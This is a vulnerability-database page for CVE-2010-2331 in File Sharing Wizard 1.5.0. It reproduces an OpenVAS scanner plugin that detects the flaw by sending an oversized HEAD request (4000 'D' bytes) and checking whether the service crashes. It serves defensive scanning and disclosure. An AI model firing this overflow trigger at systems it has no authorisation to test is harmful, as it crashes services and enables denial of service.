Lucene search
+L

File Sharing Wizard 'HEAD' Command Remote Buffer Overflow Vulnerability

🗓️ 05 Aug 2010 00:00:00Reported by Copyright (C) 2010 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 25 Views

File Sharing Wizard 'HEAD' Command Remote Buffer Overflow Vulnerability. Buffer-overflow vulnerability in File Sharing Wizard 1.5.0 allows remote attackers to execute arbitrary code and cause denial-of-service conditions

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2010-2331
17 Jun 201000:00
circl
CVE
CVE-2010-2331
18 Jun 201020:00
cve
Cvelist
CVE-2010-2331
18 Jun 201020:00
cvelist
Exploit DB
File Sharing Wizard 1.5.0 - Remote Overflow (SEH)
17 Jun 201000:00
exploitdb
EUVD
EUVD-2010-2341
7 Oct 202500:30
euvd
NVD
CVE-2010-2331
18 Jun 201020:30
nvd
OpenVAS
File Sharing Wizard 'HEAD' Command Remote Buffer Overflow Vulnerability
5 Aug 201000:00
openvas
Prion
Stack overflow
18 Jun 201020:30
prion
Prion
Design/Logic Flaw
24 Sep 201921:15
prion
Prion
Stack overflow
9 Oct 201922:15
prion
Rows per page
SourceLink
securityfocuswww.securityfocus.com/bid/40928
# SPDX-FileCopyrightText: 2010 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if (description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.100745");
  script_version("2023-07-21T05:05:22+0000");
  script_tag(name:"last_modification", value:"2023-07-21 05:05:22 +0000 (Fri, 21 Jul 2023)");
  script_tag(name:"creation_date", value:"2010-08-05 13:46:20 +0200 (Thu, 05 Aug 2010)");
  script_tag(name:"cvss_base", value:"9.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:C/I:C/A:C");
  script_cve_id("CVE-2010-2331");

  script_name("File Sharing Wizard 'HEAD' Command Remote Buffer Overflow Vulnerability");

  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/40928");

  script_tag(name:"qod_type", value:"remote_analysis");
  script_category(ACT_DENIAL);
  script_family("Buffer overflow");
  script_copyright("Copyright (C) 2010 Greenbone AG");
  script_dependencies("find_service.nasl", "httpver.nasl", "global_settings.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");

  script_tag(name:"summary", value:"File Sharing Wizard is prone to a remote buffer-overflow
  vulnerability because it fails to perform adequate boundary checks on user-supplied input.");

  script_tag(name:"impact", value:"Successfully exploiting this issue may allow remote attackers to
  execute arbitrary code in the context of the application. Failed attacks will cause
  denial-of-service conditions.");

  script_tag(name:"affected", value:"File Sharing Wizard 1.5.0 is known to be vulnerable. Other
  versions may also be affected.");

  script_tag(name:"solution_type", value:"WillNotFix");
  script_tag(name:"solution", value:"No known solution was made available for at least one year
  since the disclosure of this vulnerability. Likely none will be provided anymore.
  General solution options are to upgrade to a newer release, disable respective features,
  remove the product or replace the product by another one.");

  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");

port = http_get_port( default:80 );

url = string("/");
buf = http_get_cache(item:url, port:port);

if("File Sharing Wizard" >!< buf)exit(0);

if(http_is_dead(port:port))exit(0);

soc = open_sock_tcp(port);
if(!soc)exit(0);

ex = crap(data:"D", length: 4000);
send(socket:soc,data:string("HEAD ",ex," HTTP/1.0\r\n\r\n"));
close(soc);

sleep(5);

if(http_is_dead(port:port)) {
  security_message(port:port);
  exit(0);
}

exit(0);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Jul 2023 00:00Current
9.5High risk
Vulners AI Score9.5
CVSS 29.3
EPSS0.05586
25